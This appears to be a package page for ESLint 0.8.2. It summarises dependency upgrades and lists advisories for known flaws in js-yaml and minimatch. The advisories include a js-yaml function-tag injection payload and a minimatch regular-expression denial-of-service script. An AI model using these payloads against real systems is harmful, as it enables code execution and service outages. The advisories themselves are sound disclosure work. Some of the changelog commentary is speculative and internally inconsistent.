ESLint version 0.8.2 introduces several dependency updates and represents a minor but important upgrade for JavaScript developers using this popular linting tool. The core functionality, an Esprima-based pattern checker, remains consistent, ensuring a smooth transition for existing users. Key dependency upgrades include chalk (from ~0.4.0 to ~0.5.1), debug (from ^0.8.1 to ^2.0.0), esprima (from ^1.2.0 to ^1.2.2), js-yaml (from ~3.0.1 to ~3.2.2), doctrine (from ~0.5.0 to ^0.5.2), minimatch (from ~0.3.0 to ^1.0.0), estraverse (from ~1.3.0 to ~1.5.1) and object-assign (from ^0.3.1 to ^1.0.0). These updates likely incorporate bug fixes, performance improvements, and potentially new features within those dependencies, which translate to a more robust and efficient linting experience.
Developer toolchain updates are also present, notably in devDependencies. Highlights count shelljs (from ~0.2 to ^0.3.0), istanbul (from ~0.2.3 to ^0.3.2), jsonlint (from ~1.6.0 to ^1.6.2), phantomjs (from ~1.9.2-6 to ^1.9.9), browserify (from ~3.20.0 to ^5.11.2), dateformat (from ~1.0.7-1.2.3 to ^1.0.8), eslint-tester from (^0.1.0 to ^0.2.1) and mocha-phantomjs from (~3.3.1 to ~3.5.0). The update to debug and esprima are impactful to eslint's core functionality. While these changes might not directly impact daily usage, staying current with these updates ensures compatibility and access to the latest tooling features for an optimized development workflow. Version 0.8.2 improves the foundation for JavaScript linting and code quality.
All the vulnerabilities related to the version 0.8.2 of the package
Denial of Service in js-yaml
Versions of js-yaml prior to 3.13.0 are vulnerable to Denial of Service. By parsing a carefully-crafted YAML file, the node process stalls and may exhaust system resources leading to a Denial of Service.
Upgrade to version 3.13.0.
Code Injection in js-yaml
Versions of js-yaml prior to 3.13.1 are vulnerable to Code Injection. The load() function may execute arbitrary code injected through a malicious YAML file. Objects that have toString as key, JavaScript code as value and are used as explicit mapping keys allow attackers to execute the supplied code through the load() function. The safeLoad() function is unaffected.
An example payload is
{ toString: !<tag:yaml.org,2002:js/function> 'function (){return Date.now()}' } : 1
which returns the object
{
"1553107949161": 1
}
Upgrade to version 3.13.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.